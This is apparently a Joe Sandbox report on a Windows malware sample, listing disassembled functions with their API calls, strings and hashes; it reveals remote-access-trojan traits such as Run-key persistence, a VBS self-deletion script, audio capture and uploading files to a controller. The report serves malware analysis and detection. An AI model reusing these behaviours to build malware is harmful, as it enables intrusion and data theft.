                                • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D096 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 260registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                • ExitProcess.KERNEL32 ref: 0040D419
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$pth_unenc$wend$while fso.FileExists("$Mw
                                • API String ID: 3797177996-1005733700
                                • Opcode ID: 20ad542f7171711714ea231336f0bfedc48dcef2d82ad876a4b4a36a3752c16a
                                • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                • Opcode Fuzzy Hash: 20ad542f7171711714ea231336f0bfedc48dcef2d82ad876a4b4a36a3752c16a
                                • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412475 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,(x,00000003), ref: 00412494
                                • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                • GetCurrentProcessId.KERNEL32 ref: 00412541
                                • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                • Sleep.KERNEL32(000001F4), ref: 00412682
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: (x$.exe$8SG$WDH$exepath$open$temp_
                                • API String ID: 2649220323-3007659718
                                • Opcode ID: 41acead5e00a0d3b02ed220858109bffcea00a40e5874d1294efd922ef337f81
                                • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                • Opcode Fuzzy Hash: 41acead5e00a0d3b02ed220858109bffcea00a40e5874d1294efd922ef337f81
                                • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                • SetEvent.KERNEL32 ref: 0041B219
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                • CloseHandle.KERNEL32 ref: 0041B23A
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                • API String ID: 738084811-2094122233
                                • Opcode ID: 6ef51392ff8895417ea989398018cdc7f1dc70480f06eceb7defc699de156b83
                                • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                • Opcode Fuzzy Hash: 6ef51392ff8895417ea989398018cdc7f1dc70480f06eceb7defc699de156b83
                                • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
                                • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\1m70ggeepT.exe,00000001,0040764D,C:\Users\user\Desktop\1m70ggeepT.exe,00000003,00407675,Mw,004076CE), ref: 00407284
                                • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: C:\Users\user\Desktop\1m70ggeepT.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                • API String ID: 1646373207-239360271
                                • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?), ref: 0041C036
                                • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                • lstrlenW.KERNEL32(?), ref: 0041C067
                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                • _wcslen.LIBCMT ref: 0041C13B
                                • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                • GetLastError.KERNEL32 ref: 0041C173
                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                • GetLastError.KERNEL32 ref: 0041C1D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                • String ID: ?
                                • API String ID: 3941738427-1684325040
                                • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable$_wcschr
                                • String ID:
                                • API String ID: 3899193279-0
                                • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                • Sleep.KERNEL32(00000064), ref: 00412E94
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$0TG$0TG$NG$NG
                                • API String ID: 1223786279-2576077980
                                • Opcode ID: 45816bd423e92bb8680930aa6a7d7804db8f63587a8a1e07c71b8186c8759938
                                • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                • Opcode Fuzzy Hash: 45816bd423e92bb8680930aa6a7d7804db8f63587a8a1e07c71b8186c8759938
                                • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408B7A Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 328fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                • __aulldiv.LIBCMT ref: 00408D4D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $hdF$NG
                                • API String ID: 3086580692-1206044436
                                • Opcode ID: 64cefbb928e21c2f7d127ca4721bf1c832eccef9f0ecc8420659d86e10d9b8ce
                                • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                • Opcode Fuzzy Hash: 64cefbb928e21c2f7d127ca4721bf1c832eccef9f0ecc8420659d86e10d9b8ce
                                • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414D86 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 109libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                • String ID: IA$\ws2_32$\wship6$getaddrinfo
                                • API String ID: 2490988753-2533987332
                                • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                Download Yara Rule
                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                • GetCursorPos.USER32(?), ref: 0041D5E9
                                • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                • ExitProcess.KERNEL32 ref: 0041D665
                                • CreatePopupMenu.USER32 ref: 0041D66B
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                • SetEvent.KERNEL32(00000000), ref: 00404E43
                                • CloseHandle.KERNEL32(00000000), ref: 00404E4C
                                • closesocket.WS2_32(FFFFFFFF), ref: 00404E5A
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404E91
                                • SetEvent.KERNEL32(00000000), ref: 00404EA2
